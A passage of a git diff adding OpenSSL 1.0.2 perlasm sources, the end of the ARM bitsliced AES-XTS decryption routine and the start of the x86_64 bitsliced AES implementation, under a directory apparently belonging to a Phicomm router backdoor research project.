+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+
+	subs		$len, #0x80
+	bpl		.Lxts_dec_loop
+
+.Lxts_dec_short:
+	adds		$len, #0x70
+	bmi		.Lxts_dec_done
+
+	vldmia		$magic, {$twmask}	@ load XTS magic
+	vshr.s64	@T[0], @XMM[8], #63
+	mov		r0, sp
+	vand		@T[0], @T[0], $twmask
+___
+for($i=9;$i<16;$i++) {
+$code.=<<___;
+	vadd.u64	@XMM[$i], @XMM[$i-1], @XMM[$i-1]
+	vst1.64		{@XMM[$i-1]}, [r0,:128]!
+	vswp		`&Dhi("@T[0]")`,`&Dlo("@T[0]")`
+	vshr.s64	@T[1], @XMM[$i], #63
+	veor		@XMM[$i], @XMM[$i], @T[0]
+	vand		@T[1], @T[1], $twmask
+___
+	@T=reverse(@T);
+
+$code.=<<___ if ($i>=10);
+	vld1.8		{@XMM[$i-10]}, [$inp]!
+	subs		$len, #0x10
+	bmi		.Lxts_dec_`$i-9`
+___
+$code.=<<___ if ($i>=11);
+	veor		@XMM[$i-11], @XMM[$i-11], @XMM[$i-3]
+___
+}
+$code.=<<___;
+	sub		$len, #0x10
+	vst1.64		{@XMM[15]}, [r0,:128]		@ next round tweak
+
+	vld1.8		{@XMM[6]}, [$inp]!
+	veor		@XMM[5], @XMM[5], @XMM[13]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[6], @XMM[6], @XMM[14]
+	mov		r5, $rounds			@ pass rounds
+	mov		r0, sp
+
+	bl		_bsaes_decrypt8
+
+	vld1.64		{@XMM[ 8]-@XMM[ 9]}, [r0,:128]!
+	vld1.64		{@XMM[10]-@XMM[11]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	vld1.64		{@XMM[12]-@XMM[13]}, [r0,:128]!
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	veor		@XMM[8], @XMM[6], @XMM[10]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+	veor		@XMM[9], @XMM[4], @XMM[11]
+	vld1.64		{@XMM[14]}, [r0,:128]!
+	veor		@XMM[10], @XMM[2], @XMM[12]
+	vst1.8		{@XMM[8]-@XMM[9]}, [$out]!
+	veor		@XMM[11], @XMM[7], @XMM[13]
+	veor		@XMM[12], @XMM[3], @XMM[14]
+	vst1.8		{@XMM[10]-@XMM[11]}, [$out]!
+	vst1.8		{@XMM[12]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+	b		.Lxts_dec_done
+.align	4
+.Lxts_dec_6:
+	vst1.64		{@XMM[14]}, [r0,:128]		@ next round tweak
+
+	veor		@XMM[4], @XMM[4], @XMM[12]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[5], @XMM[5], @XMM[13]
+	mov		r5, $rounds			@ pass rounds
+	mov		r0, sp
+
+	bl		_bsaes_decrypt8
+
+	vld1.64		{@XMM[ 8]-@XMM[ 9]}, [r0,:128]!
+	vld1.64		{@XMM[10]-@XMM[11]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	vld1.64		{@XMM[12]-@XMM[13]}, [r0,:128]!
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	veor		@XMM[8], @XMM[6], @XMM[10]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+	veor		@XMM[9], @XMM[4], @XMM[11]
+	veor		@XMM[10], @XMM[2], @XMM[12]
+	vst1.8		{@XMM[8]-@XMM[9]}, [$out]!
+	veor		@XMM[11], @XMM[7], @XMM[13]
+	vst1.8		{@XMM[10]-@XMM[11]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+	b		.Lxts_dec_done
+.align	4
+.Lxts_dec_5:
+	vst1.64		{@XMM[13]}, [r0,:128]		@ next round tweak
+
+	veor		@XMM[3], @XMM[3], @XMM[11]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[4], @XMM[4], @XMM[12]
+	mov		r5, $rounds			@ pass rounds
+	mov		r0, sp
+
+	bl		_bsaes_decrypt8
+
+	vld1.64		{@XMM[ 8]-@XMM[ 9]}, [r0,:128]!
+	vld1.64		{@XMM[10]-@XMM[11]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	vld1.64		{@XMM[12]}, [r0,:128]!
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	veor		@XMM[8], @XMM[6], @XMM[10]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+	veor		@XMM[9], @XMM[4], @XMM[11]
+	veor		@XMM[10], @XMM[2], @XMM[12]
+	vst1.8		{@XMM[8]-@XMM[9]}, [$out]!
+	vst1.8		{@XMM[10]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+	b		.Lxts_dec_done
+.align	4
+.Lxts_dec_4:
+	vst1.64		{@XMM[12]}, [r0,:128]		@ next round tweak
+
+	veor		@XMM[2], @XMM[2], @XMM[10]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[3], @XMM[3], @XMM[11]
+	mov		r5, $rounds			@ pass rounds
+	mov		r0, sp
+
+	bl		_bsaes_decrypt8
+
+	vld1.64		{@XMM[ 8]-@XMM[ 9]}, [r0,:128]!
+	vld1.64		{@XMM[10]-@XMM[11]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	veor		@XMM[8], @XMM[6], @XMM[10]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+	veor		@XMM[9], @XMM[4], @XMM[11]
+	vst1.8		{@XMM[8]-@XMM[9]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+	b		.Lxts_dec_done
+.align	4
+.Lxts_dec_3:
+	vst1.64		{@XMM[11]}, [r0,:128]		@ next round tweak
+
+	veor		@XMM[1], @XMM[1], @XMM[9]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[2], @XMM[2], @XMM[10]
+	mov		r5, $rounds			@ pass rounds
+	mov		r0, sp
+
+	bl		_bsaes_decrypt8
+
+	vld1.64		{@XMM[8]-@XMM[9]}, [r0,:128]!
+	vld1.64		{@XMM[10]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	veor		@XMM[8], @XMM[6], @XMM[10]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+	vst1.8		{@XMM[8]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+	b		.Lxts_dec_done
+.align	4
+.Lxts_dec_2:
+	vst1.64		{@XMM[10]}, [r0,:128]		@ next round tweak
+
+	veor		@XMM[0], @XMM[0], @XMM[8]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[1], @XMM[1], @XMM[9]
+	mov		r5, $rounds			@ pass rounds
+	mov		r0, sp
+
+	bl		_bsaes_decrypt8
+
+	vld1.64		{@XMM[8]-@XMM[9]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+	b		.Lxts_dec_done
+.align	4
+.Lxts_dec_1:
+	mov		r0, sp
+	veor		@XMM[0], @XMM[8]
+	mov		r1, sp
+	vst1.8		{@XMM[0]}, [sp,:128]
+	mov		r2, $key
+	mov		r4, $fp				@ preserve fp
+	mov		r5, $magic			@ preserve magic
+
+	bl		AES_decrypt
+
+	vld1.8		{@XMM[0]}, [sp,:128]
+	veor		@XMM[0], @XMM[0], @XMM[8]
+	vst1.8		{@XMM[0]}, [$out]!
+	mov		$fp, r4
+	mov		$magic, r5
+
+	vmov		@XMM[8], @XMM[9]		@ next round tweak
+
+.Lxts_dec_done:
+#ifndef	XTS_CHAIN_TWEAK
+	adds		$len, #0x10
+	beq		.Lxts_dec_ret
+
+	@ calculate one round of extra tweak for the stolen ciphertext
+	vldmia		$magic, {$twmask}
+	vshr.s64	@XMM[6], @XMM[8], #63
+	vand		@XMM[6], @XMM[6], $twmask
+	vadd.u64	@XMM[9], @XMM[8], @XMM[8]
+	vswp		`&Dhi("@XMM[6]")`,`&Dlo("@XMM[6]")`
+	veor		@XMM[9], @XMM[9], @XMM[6]
+
+	@ perform the final decryption with the last tweak value
+	vld1.8		{@XMM[0]}, [$inp]!
+	mov		r0, sp
+	veor		@XMM[0], @XMM[0], @XMM[9]
+	mov		r1, sp
+	vst1.8		{@XMM[0]}, [sp,:128]
+	mov		r2, $key
+	mov		r4, $fp			@ preserve fp
+
+	bl		AES_decrypt
+
+	vld1.8		{@XMM[0]}, [sp,:128]
+	veor		@XMM[0], @XMM[0], @XMM[9]
+	vst1.8		{@XMM[0]}, [$out]
+
+	mov		r6, $out
+.Lxts_dec_steal:
+	ldrb		r1, [$out]
+	ldrb		r0, [$inp], #1
+	strb		r1, [$out, #0x10]
+	strb		r0, [$out], #1
+
+	subs		$len, #1
+	bhi		.Lxts_dec_steal
+
+	vld1.8		{@XMM[0]}, [r6]
+	mov		r0, sp
+	veor		@XMM[0], @XMM[8]
+	mov		r1, sp
+	vst1.8		{@XMM[0]}, [sp,:128]
+	mov		r2, $key
+
+	bl		AES_decrypt
+
+	vld1.8		{@XMM[0]}, [sp,:128]
+	veor		@XMM[0], @XMM[0], @XMM[8]
+	vst1.8		{@XMM[0]}, [r6]
+	mov		$fp, r4
+#endif
+
+.Lxts_dec_ret:
+	bic		r0, $fp, #0xf
+	vmov.i32	q0, #0
+	vmov.i32	q1, #0
+#ifdef	XTS_CHAIN_TWEAK
+	ldr		r1, [$fp, #0x20+VFP_ABI_FRAME]	@ chain tweak
+#endif
+.Lxts_dec_bzero:				@ wipe key schedule [if any]
+	vstmia		sp!, {q0-q1}
+	cmp		sp, r0
+	bne		.Lxts_dec_bzero
+
+	mov		sp, $fp
+#ifdef	XTS_CHAIN_TWEAK
+	vst1.8		{@XMM[8]}, [r1]
+#endif
+	VFP_ABI_POP
+	ldmia		sp!, {r4-r10, pc}	@ return
+
+.size	bsaes_xts_decrypt,.-bsaes_xts_decrypt
+___
+}
+$code.=<<___;
+#endif
+___
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+
+open SELF,$0;
+while(<SELF>) {
+	next if (/^#!/);
+        last if (!s/^#/@/ and !/^$/);
+        print;
+}
+close SELF;
+
+print $code;
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/bsaes-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/bsaes-x86_64.pl
new file mode 100644
index 0000000..3f7d33c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/bsaes-x86_64.pl
@@ -0,0 +1,3102 @@
+#!/usr/bin/env perl
+
+###################################################################
+### AES-128 [originally in CTR mode]				###
+### bitsliced implementation for Intel Core 2 processors	###
+### requires support of SSE extensions up to SSSE3		###
+### Author: Emilia Käsper and Peter Schwabe			###
+### Date: 2009-03-19						###
+### Public domain						###
+###								###
+### See http://homes.esat.kuleuven.be/~ekasper/#software for	###
+### further information.					###
+###################################################################
+#
+# September 2011.
+#
+# Started as transliteration to "perlasm" the original code has
+# undergone following changes:
+#
+# - code was made position-independent;
+# - rounds were folded into a loop resulting in >5x size reduction
+#   from 12.5KB to 2.2KB;
+# - above was possibile thanks to mixcolumns() modification that
+#   allowed to feed its output back to aesenc[last], this was
+#   achieved at cost of two additional inter-registers moves;
+# - some instruction reordering and interleaving;
+# - this module doesn't implement key setup subroutine, instead it
+#   relies on conversion of "conventional" key schedule as returned
+#   by AES_set_encrypt_key (see discussion below);
+# - first and last round keys are treated differently, which allowed
+#   to skip one shiftrows(), reduce bit-sliced key schedule and
+#   speed-up conversion by 22%;
+# - support for 192- and 256-bit keys was added;
+#
+# Resulting performance in CPU cycles spent to encrypt one byte out
+# of 4096-byte buffer with 128-bit key is:
+#
+#		Emilia's	this(*)		difference
+#
+# Core 2    	9.30		8.69		+7%
+# Nehalem(**) 	7.63		6.88		+11%
+# Atom	    	17.1		16.4		+4%
+# Silvermont	-		12.9
+#
+# (*)	Comparison is not completely fair, because "this" is ECB,
+#	i.e. no extra processing such as counter values calculation
+#	and xor-ing input as in Emilia's CTR implementation is
+#	performed. However, the CTR calculations stand for not more
+#	than 1% of total time, so comparison is *rather* fair.
+#
+# (**)	Results were collected on Westmere, which is considered to
+#	be equivalent to Nehalem for this code.
+#
+# As for key schedule conversion subroutine. Interface to OpenSSL
+# relies on per-invocation on-the-fly conversion. This naturally
+# has impact on performance, especially for short inputs. Conversion
+# time in CPU cycles and its ratio to CPU cycles spent in 8x block
+# function is:
+#
+# 		conversion	conversion/8x block
+# Core 2	240		0.22
+# Nehalem	180		0.20
+# Atom		430		0.20
+#
+# The ratio values mean that 128-byte blocks will be processed
+# 16-18% slower, 256-byte blocks - 9-10%, 384-byte blocks - 6-7%,
+# etc. Then keep in mind that input sizes not divisible by 128 are
+# *effectively* slower, especially shortest ones, e.g. consecutive
+# 144-byte blocks are processed 44% slower than one would expect,
+# 272 - 29%, 400 - 22%, etc. Yet, despite all these "shortcomings"
+# it's still faster than ["hyper-threading-safe" code path in]
+# aes-x86_64.pl on all lengths above 64 bytes...
+#
+# October 2011.
+#
+# Add decryption procedure. Performance in CPU cycles spent to decrypt
+# one byte out of 4096-byte buffer with 128-bit key is:
+#
+# Core 2	9.98
+# Nehalem	7.80
+# Atom		17.9
+# Silvermont	14.0
+#
+# November 2011.
+#
+# Add bsaes_xts_[en|de]crypt. Less-than-80-bytes-block performance is
+# suboptimal, but XTS is meant to be used with larger blocks...
+#
+#						<appro@openssl.org>
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+my ($inp,$out,$len,$key,$ivp)=("%rdi","%rsi","%rdx","%rcx");
+my @XMM=map("%xmm$_",(15,0..14));	# best on Atom, +10% over (0..15)
+my $ecb=0;	# suppress unreferenced ECB subroutines, spare some space...
+
+{
+my ($key,$rounds,$const)=("%rax","%r10d","%r11");
+
+sub Sbox {
+# input in  lsb > [b0, b1, b2, b3, b4, b5, b6, b7] < msb
+# output in lsb > [b0, b1, b4, b6, b3, b7, b2, b5] < msb
+my @b=@_[0..7];
+my @t=@_[8..11];
+my @s=@_[12..15];
+	&InBasisChange	(@b);
+	&Inv_GF256	(@b[6,5,0,3,7,1,4,2],@t,@s);
+	&OutBasisChange	(@b[7,1,4,2,6,5,0,3]);
+}
+
+sub InBasisChange {
+# input in  lsb > [b0, b1, b2, b3, b4, b5, b6, b7] < msb
+# output in lsb > [b6, b5, b0, b3, b7, b1, b4, b2] < msb 
+my @b=@_[0..7];
+$code.=<<___;
+	pxor	@b[6], @b[5]
+	pxor	@b[1], @b[2]
+	pxor	@b[0], @b[3]
+	pxor	@b[2], @b[6]
+	pxor 	@b[0], @b[5]
+
+	pxor	@b[3], @b[6]
+	pxor	@b[7], @b[3]
+	pxor	@b[5], @b[7]
+	pxor	@b[4], @b[3]
+	pxor	@b[5], @b[4]
+	pxor	@b[1], @b[3]
+
+	pxor	@b[7], @b[2]
+	pxor	@b[5], @b[1]
+___
+}
+
+sub OutBasisChange {
+# input in  lsb > [b0, b1, b2, b3, b4, b5, b6, b7] < msb
+# output in lsb > [b6, b1, b2, b4, b7, b0, b3, b5] < msb
+my @b=@_[0..7];
+$code.=<<___;
+	pxor	@b[6], @b[0]
+	pxor	@b[4], @b[1]
+	pxor	@b[0], @b[2]
+	pxor	@b[6], @b[4]
+	pxor	@b[1], @b[6]
+
+	pxor	@b[5], @b[1]
+	pxor	@b[3], @b[5]
+	pxor	@b[7], @b[3]
+	pxor	@b[5], @b[7]
+	pxor	@b[5], @b[2]
+
+	pxor	@b[7], @b[4]
+___
+}
+
+sub InvSbox {
+# input in lsb 	> [b0, b1, b2, b3, b4, b5, b6, b7] < msb
+# output in lsb	> [b0, b1, b6, b4, b2, b7, b3, b5] < msb
+my @b=@_[0..7];
+my @t=@_[8..11];
+my @s=@_[12..15];
+	&InvInBasisChange	(@b);
+	&Inv_GF256		(@b[5,1,2,6,3,7,0,4],@t,@s);
+	&InvOutBasisChange	(@b[3,7,0,4,5,1,2,6]);
+}
+
+sub InvInBasisChange {		# OutBasisChange in reverse
+my @b=@_[5,1,2,6,3,7,0,4];
+$code.=<<___
+	pxor	@b[7], @b[4]
+
+	pxor	@b[5], @b[7]
+	pxor	@b[5], @b[2]
+	pxor	@b[7], @b[3]
+	pxor	@b[3], @b[5]
+	pxor	@b[5], @b[1]
+
+	pxor	@b[1], @b[6]
+	pxor	@b[0], @b[2]
+	pxor	@b[6], @b[4]
+	pxor	@b[6], @b[0]
+	pxor	@b[4], @b[1]
+___
+}
+
+sub InvOutBasisChange {		# InBasisChange in reverse
+my @b=@_[2,5,7,3,6,1,0,4];
+$code.=<<___;
+	pxor	@b[5], @b[1]
+	pxor	@b[7], @b[2]
+
+	pxor	@b[1], @b[3]
+	pxor	@b[5], @b[4]
+	pxor	@b[5], @b[7]
+	pxor	@b[4], @b[3]
+	 pxor 	@b[0], @b[5]
+	pxor	@b[7], @b[3]
+	 pxor	@b[2], @b[6]
+	 pxor	@b[1], @b[2]
+	pxor	@b[3], @b[6]
+
+	pxor	@b[0], @b[3]
+	pxor	@b[6], @b[5]
+___
+}
+
+sub Mul_GF4 {
+#;*************************************************************
+#;* Mul_GF4: Input x0-x1,y0-y1 Output x0-x1 Temp t0 (8) *
+#;*************************************************************
+my ($x0,$x1,$y0,$y1,$t0)=@_;
+$code.=<<___;
+	movdqa	$y0, $t0
+	pxor 	$y1, $t0
+	pand	$x0, $t0
+	pxor	$x1, $x0
+	pand	$y0, $x1
+	pand	$y1, $x0
+	pxor	$x1, $x0
+	pxor	$t0, $x1
+___
+}
+
+sub Mul_GF4_N {				# not used, see next subroutine
+# multiply and scale by N
+my ($x0,$x1,$y0,$y1,$t0)=@_;
+$code.=<<___;
+	movdqa	$y0, $t0
+	pxor	$y1, $t0
+	pand	$x0, $t0
+	pxor	$x1, $x0
+	pand	$y0, $x1
+	pand	$y1, $x0
+	pxor	$x0, $x1
+	pxor	$t0, $x0
+___
+}
+
+sub Mul_GF4_N_GF4 {
+# interleaved Mul_GF4_N and Mul_GF4
+my ($x0,$x1,$y0,$y1,$t0,
+    $x2,$x3,$y2,$y3,$t1)=@_;
+$code.=<<___;
+	movdqa	$y0, $t0
+	 movdqa	$y2, $t1
+	pxor	$y1, $t0
+	 pxor 	$y3, $t1
+	pand	$x0, $t0
+	 pand	$x2, $t1
+	pxor	$x1, $x0
+	 pxor	$x3, $x2
+	pand	$y0, $x1
+	 pand	$y2, $x3
+	pand	$y1, $x0
+	 pand	$y3, $x2
+	pxor	$x0, $x1
+	 pxor	$x3, $x2
+	pxor	$t0, $x0
+	 pxor	$t1, $x3
+___
+}
+sub Mul_GF16_2 {
+my @x=@_[0..7];
+my @y=@_[8..11];
+my @t=@_[12..15];
+$code.=<<___;
+	movdqa	@x[0], @t[0]
+	movdqa	@x[1], @t[1]
+___
+	&Mul_GF4  	(@x[0], @x[1], @y[0], @y[1], @t[2]);
+$code.=<<___;
+	pxor	@x[2], @t[0]
+	pxor	@x[3], @t[1]
+	pxor	@y[2], @y[0]
+	pxor	@y[3], @y[1]
+___
+	Mul_GF4_N_GF4	(@t[0], @t[1], @y[0], @y[1], @t[3],
+			 @x[2], @x[3], @y[2], @y[3], @t[2]);
+$code.=<<___;
+	pxor	@t[0], @x[0]
+	pxor	@t[0], @x[2]
+	pxor	@t[1], @x[1]
+	pxor	@t[1], @x[3]
+
+	movdqa	@x[4], @t[0]
+	movdqa	@x[5], @t[1]
+	pxor	@x[6], @t[0]
+	pxor	@x[7], @t[1]
+___
+	&Mul_GF4_N_GF4	(@t[0], @t[1], @y[0], @y[1], @t[3],
+			 @x[6], @x[7], @y[2], @y[3], @t[2]);
+$code.=<<___;
+	pxor	@y[2], @y[0]
+	pxor	@y[3], @y[1]
+___
+	&Mul_GF4  	(@x[4], @x[5], @y[0], @y[1], @t[3]);
+$code.=<<___;
+	pxor	@t[0], @x[4]
+	pxor	@t[0], @x[6]
+	pxor	@t[1], @x[5]
+	pxor	@t[1], @x[7]
+___
+}
+sub Inv_GF256 {
+#;********************************************************************
+#;* Inv_GF256: Input x0-x7 Output x0-x7 Temp t0-t3,s0-s3 (144)       *
+#;********************************************************************
+my @x=@_[0..7];
+my @t=@_[8..11];
+my @s=@_[12..15];
+# direct optimizations from hardware
+$code.=<<___;
+	movdqa	@x[4], @t[3]
+	movdqa	@x[5], @t[2]
+	movdqa	@x[1], @t[1]
+	movdqa	@x[7], @s[1]
+	movdqa	@x[0], @s[0]
+
+	pxor	@x[6], @t[3]
+	pxor	@x[7], @t[2]
+	pxor	@x[3], @t[1]
+	 movdqa	@t[3], @s[2]
+	pxor	@x[6], @s[1]
+	 movdqa	@t[2], @t[0]
+	pxor	@x[2], @s[0]
+	 movdqa	@t[3], @s[3]
+
+	por	@t[1], @t[2]
+	por	@s[0], @t[3]
+	pxor	@t[0], @s[3]
+	pand	@s[0], @s[2]
+	pxor	@t[1], @s[0]
+	pand	@t[1], @t[0]
+	pand	@s[0], @s[3]
+	movdqa	@x[3], @s[0]
+	pxor	@x[2], @s[0]
+	pand	@s[0], @s[1]
+	pxor	@s[1], @t[3]
+	pxor	@s[1], @t[2]
+	movdqa	@x[4], @s[1]
+	movdqa	@x[1], @s[0]
+	pxor	@x[5], @s[1]
+	pxor	@x[0], @s[0]
+	movdqa	@s[1], @t[1]
+	pand	@s[0], @s[1]
+	por	@s[0], @t[1]
+	pxor	@s[1], @t[0]
+	pxor	@s[3], @t[3]
+	pxor	@s[2], @t[2]
+	pxor	@s[3], @t[1]
+	movdqa	@x[7], @s[0]
+	pxor	@s[2], @t[0]
+	movdqa	@x[6], @s[1]
+	pxor	@s[2], @t[1]
+	movdqa	@x[5], @s[2]
+	pand	@x[3], @s[0]
+	movdqa	@x[4], @s[3]
+	pand	@x[2], @s[1]
+	pand	@x[1], @s[2]
+	por	@x[0], @s[3]
+	pxor	@s[0], @t[3]
+	pxor	@s[1], @t[2]
+	pxor	@s[2], @t[1]
+	pxor	@s[3], @t[0] 
+
+	#Inv_GF16 \t0, \t1, \t2, \t3, \s0, \s1, \s2, \s3
+
+	# new smaller inversion
+
+	movdqa	@t[3], @s[0]
+	pand	@t[1], @t[3]
+	pxor	@t[2], @s[0]
+
+	movdqa	@t[0], @s[2]
+	movdqa	@s[0], @s[3]
+	pxor	@t[3], @s[2]
+	pand	@s[2], @s[3]
+
+	movdqa	@t[1], @s[1]
+	pxor	@t[2], @s[3]
+	pxor	@t[0], @s[1]
+
+	pxor	@t[2], @t[3]
+
+	pand	@t[3], @s[1]
+
+	movdqa	@s[2], @t[2]
+	pxor	@t[0], @s[1]
+
+	pxor	@s[1], @t[2]
+	pxor	@s[1], @t[1]
+
+	pand	@t[0], @t[2]
+
+	pxor	@t[2], @s[2]
+	pxor	@t[2], @t[1]
+
+	pand	@s[3], @s[2]
+
+	pxor	@s[0], @s[2]
+___
+# output in s3, s2, s1, t1
+
+# Mul_GF16_2 \x0, \x1, \x2, \x3, \x4, \x5, \x6, \x7, \t2, \t3, \t0, \t1, \s0, \s1, \s2, \s3
+
+# Mul_GF16_2 \x0, \x1, \x2, \x3, \x4, \x5, \x6, \x7, \s3, \s2, \s1, \t1, \s0, \t0, \t2, \t3
+	&Mul_GF16_2(@x,@s[3,2,1],@t[1],@s[0],@t[0,2,3]);
+
+### output msb > [x3,x2,x1,x0,x7,x6,x5,x4] < lsb
+}
+
+# AES linear components
+
+sub ShiftRows {
+my @x=@_[0..7];
+my $mask=pop;
+$code.=<<___;
+	pxor	0x00($key),@x[0]
+	pxor	0x10($key),@x[1]
+	pxor	0x20($key),@x[2]
+	pxor	0x30($key),@x[3]
+	pshufb	$mask,@x[0]
+	pshufb	$mask,@x[1]
+	pxor	0x40($key),@x[4]
+	pxor	0x50($key),@x[5]
+	pshufb	$mask,@x[2]
+	pshufb	$mask,@x[3]
+	pxor	0x60($key),@x[6]
+	pxor	0x70($key),@x[7]
+	pshufb	$mask,@x[4]
+	pshufb	$mask,@x[5]
+	pshufb	$mask,@x[6]
+	pshufb	$mask,@x[7]
+	lea	0x80($key),$key
+___
+}
+
+sub MixColumns {
+# modified to emit output in order suitable for feeding back to aesenc[last]
+my @x=@_[0..7];
+my @t=@_[8..15];
+my $inv=@_[16];	# optional
+$code.=<<___;
+	pshufd	\$0x93, @x[0], @t[0]	# x0 <<< 32
+	pshufd	\$0x93, @x[1], @t[1]
+	 pxor	@t[0], @x[0]		# x0 ^ (x0 <<< 32)
+	pshufd	\$0x93, @x[2], @t[2]
+	 pxor	@t[1], @x[1]
+	pshufd	\$0x93, @x[3], @t[3]
+	 pxor	@t[2], @x[2]
+	pshufd	\$0x93, @x[4], @t[4]
+	 pxor	@t[3], @x[3]
+	pshufd	\$0x93, @x[5], @t[5]
+	 pxor	@t[4], @x[4]
+	pshufd	\$0x93, @x[6], @t[6]
+	 pxor	@t[5], @x[5]
+	pshufd	\$0x93, @x[7], @t[7]
+	 pxor	@t[6], @x[6]
+	 pxor	@t[7], @x[7]
+
+	pxor	@x[0], @t[1]
+	pxor	@x[7], @t[0]
+	pxor	@x[7], @t[1]
+	 pshufd	\$0x4E, @x[0], @x[0] 	# (x0 ^ (x0 <<< 32)) <<< 64)
+	pxor	@x[1], @t[2]
+	 pshufd	\$0x4E, @x[1], @x[1]
+	pxor	@x[4], @t[5]
+	 pxor	@t[0], @x[0]
+	pxor	@x[5], @t[6]
+	 pxor	@t[1], @x[1]
+	pxor	@x[3], @t[4]
+	 pshufd	\$0x4E, @x[4], @t[0]
+	pxor	@x[6], @t[7]
+	 pshufd	\$0x4E, @x[5], @t[1]
+	pxor	@x[2], @t[3]
+	 pshufd	\$0x4E, @x[3], @x[4]
+	pxor	@x[7], @t[3]
+	 pshufd	\$0x4E, @x[7], @x[5]
+	pxor	@x[7], @t[4]
+	 pshufd	\$0x4E, @x[6], @x[3]
+	pxor	@t[4], @t[0]
+	 pshufd	\$0x4E, @x[2], @x[6]
+	pxor	@t[5], @t[1]
+___
+$code.=<<___ if (!$inv);
+	pxor	@t[3], @x[4]
+	pxor	@t[7], @x[5]
+	pxor	@t[6], @x[3]
+	 movdqa	@t[0], @x[2]
+	pxor	@t[2], @x[6]
+	 movdqa	@t[1], @x[7]
+___
+$code.=<<___ if ($inv);
+	pxor	@x[4], @t[3]
+	pxor	@t[7], @x[5]
+	pxor	@x[3], @t[6]
+	 movdqa	@t[0], @x[3]
+	pxor	@t[2], @x[6]
+	 movdqa	@t[6], @x[2]
+	 movdqa	@t[1], @x[7]
+	 movdqa	@x[6], @x[4]
+	 movdqa	@t[3], @x[6]
+___
+}
+
+sub InvMixColumns_orig {
+my @x=@_[0..7];
+my @t=@_[8..15];
+
+$code.=<<___;
+	# multiplication by 0x0e
+	pshufd	\$0x93, @x[7], @t[7]
+	movdqa	@x[2], @t[2]
+	pxor	@x[5], @x[7]		# 7 5
+	pxor	@x[5], @x[2]		# 2 5
+	pshufd	\$0x93, @x[0], @t[0]
+	movdqa	@x[5], @t[5]
+	pxor	@x[0], @x[5]		# 5 0		[1]
+	pxor	@x[1], @x[0]		# 0 1
+	pshufd	\$0x93, @x[1], @t[1]
+	pxor	@x[2], @x[1]		# 1 25
+	pxor	@x[6], @x[0]		# 01 6		[2]
+	pxor	@x[3], @x[1]		# 125 3		[4]
+	pshufd	\$0x93, @x[3], @t[3]
+	pxor	@x[0], @x[2]		# 25 016	[3]
+	pxor	@x[7], @x[3]		# 3 75
+	pxor	@x[6], @x[7]		# 75 6		[0]
+	pshufd	\$0x93, @x[6], @t[6]
+	movdqa	@x[4], @t[4]
+	pxor	@x[4], @x[6]		# 6 4
+	pxor	@x[3], @x[4]		# 4 375		[6]
+	pxor	@x[7], @x[3]		# 375 756=36
+	pxor	@t[5], @x[6]		# 64 5		[7]
+	pxor	@t[2], @x[3]		# 36 2
+	pxor	@t[4], @x[3]		# 362 4		[5]
+	pshufd	\$0x93, @t[5], @t[5]
+___
+					my @y = @x[7,5,0,2,1,3,4,6];
+$code.=<<___;
+	# multiplication by 0x0b
